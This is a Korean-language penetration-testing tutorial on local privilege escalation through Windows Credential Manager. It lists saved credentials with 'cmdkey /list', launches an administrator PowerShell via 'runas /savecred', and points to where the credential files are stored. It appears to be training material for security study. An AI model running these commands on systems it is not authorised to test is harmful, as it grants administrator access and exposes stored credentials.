호스트기반모의해킹_40_윈도우 Credential Manager 악용

1. 개요

Windows Credential Manager(자격 증명 관리자)는 사용자의 편의를 위해 웹사이트, 네트워크 리소스, 애플리케이션의 자격 증명(User/Pass)을 저장하고 관리하는 기능이다.

• 작동 원리: 저장된 자격 증명은 DPAPI(Data Protection API)로 암호화되어 디스크에 저장된다.
• 취약점: 사용자가 여러 계정(예: 관리자 계정, 서비스 계정)을 편리하게 사용하기 위해 자격 증명을 저장해 둔 경우, 공격자는 비밀번호를 몰라도 저장된 자격 증명을 재사용(Pass-the-Hash와 유사)하여 해당 유저 권한으로 쉘을 실행할 수 있다.

2. 자격 증명 확인

공격자는 현재 탈취한 사용자 계정이 Credential Manager에 타겟(관리자) 계정 정보를 저장해 뒀는지 확인해야 한다.

2.1 GUI 확인(참고용)

제어판 -> 자격 증명 관리자에서 확인 가능하다.(공격 시에는 GUI 접근이 어려우므로 잘 안 씀).

• Web Credentials: 웹사이트 비밀번호(Edge, IE).
• Windows Credentials: 네트워크 공유 폴더, RDP, 로컬/도메인 계정 등.

2.2 CLI 확인(cmdkey)

커맨드 라인에서 저장된 자격 증명 목록을 확인한다.

cmdkey /list

# 결과 예시:
# Target: Domain:interactive=Administrator
# Type: Domain Password
# User: Administrator

• Target: Administrator(로컬 관리자) 계정에 대한 자격 증명이 저장되어 있음을 확인.

3. 공격 실행(Exploitation)

비밀번호를 복호화하는 것은 복잡하지만(Mimikatz 등 필요), 윈도우의 runas 명령어를 사용하면 "저장된 자격 증명을 사용해서(savecred)" 프로그램을 실행할 수 있다.

3.1 RunAs 활용

runas /savecred /user:Administrator powershell.exe

• /savecred: 저장된 자격 증명을 사용하겠다(비밀번호 입력 불필요).
• /user:Administrator: 관리자 계정으로 실행하겠다.
• powershell.exe: 실행할 프로그램.

3.2 결과 확인

명령어 실행 시, 새로운 PowerShell 창이 뜨거나 백그라운드에서 실행된다.

# 새 창에서:
whoami
# 결과: TargetHostname\Administrator

성공적으로 로컬 관리자 권한을 획득했다.

4. 실무 팁

• 비밀번호 파일 위치: 실제 암호화된 파일은 C:\Users\[User]\AppData\Roaming\Microsoft\Credentials\ 디렉토리에 저장된다.
• 필수 조건: 해당 사용자가 자격 증명을 저장하는 행위(체크박스 체크 등)를 했어야만 공격이 가능하다. 주로 여러 서버를 관리하는 시스템 관리자나 헬프데스크 직원의 PC가 주요 타겟이 된다.